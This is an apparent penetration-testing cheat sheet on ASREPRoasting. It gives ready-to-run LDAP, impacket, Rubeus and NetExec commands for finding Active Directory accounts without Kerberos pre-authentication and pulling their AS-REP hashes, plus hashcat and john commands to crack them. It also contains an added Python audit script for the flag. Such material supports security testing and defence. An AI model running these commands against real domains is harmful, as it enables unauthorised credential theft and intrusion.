ASREPRoast

Tags
Kerberos, Unauthenticated, Initial Access

Identify

nxc ldap <IP> -u '' -p '' --query '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' ""
Remote
ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,samAccountName
Local
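
For the defensive side of the Identify step, this added example (not part of the original notes) audits an LDIF export for the same userAccountControl bit the LDAP filter above tests, and separates enabled accounts from disabled ones. The sample LDIF, the account names other than svc-test, and the function names are constructed for illustration.

```python
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000  # decimal 4194304, the mask in the LDAP filter

# Constructed sample export; every account except svc-test is hypothetical.
SAMPLE_LDIF = """\
dn: CN=svc-test,OU=Service,DC=domain,DC=local
sAMAccountName: svc-test
userAccountControl: 4260352

dn: CN=alice,OU=Staff,DC=domain,DC=local
sAMAccountName: alice
userAccountControl: 512

dn: CN=old-svc,OU=Service,DC=domain,DC=local
sAMAccountName: old-svc
userAccountControl: 4194818
"""

def parse_ldif(text):
    """Yield one dict per entry, unfolding continuation lines first."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]  # RFC 2849 folding: continuation starts with a space
        else:
            lines.append(raw)
    entry = {}
    for line in lines + [""]:  # trailing blank flushes the last entry
        if not line.strip():
            if entry:
                yield entry
            entry = {}
        elif not line.startswith("#"):
            name, _, value = line.partition(":")
            entry[name.strip().lower()] = value.strip()

def audit_preauth(text):
    """Return (enabled, disabled) account names that have pre-authentication off."""
    enabled, disabled = [], []
    for e in parse_ldif(text):
        raw = e.get("useraccountcontrol", "")
        # Same test as the bitwise-AND matching rule 1.2.840.113556.1.4.803
        if raw.isdigit() and (int(raw) & UF_DONT_REQUIRE_PREAUTH) == UF_DONT_REQUIRE_PREAUTH:
            name = e.get("samaccountname") or e.get("dn", "?")
            (disabled if int(raw) & UF_ACCOUNTDISABLE else enabled).append(name)
    return enabled, disabled

if __name__ == "__main__":
    print(audit_preauth(SAMPLE_LDIF))
```

Accounts in the first list are the ones to review: re-enable pre-authentication where nothing depends on it being off, and give any account that must keep the flag a long random password.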

Exploit

Ask for TGS

nxc ldap <IP> -u '<USER>' -p '' --asreproast output.txt
Remote
impacket-GetNPUsers domain.local/svc-test -no-pass
Remote
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt /user:svc-test /nowrap
Local
Get-ASREPHash -Username svc-test -verbose
Local - https://github.com/HarmJ0y/ASREPRoast

Crack ticket

hashcat -m 18200 --force -a 0 hashes.txt <wordlist>
john --wordlist=<wordlist> hashes.txt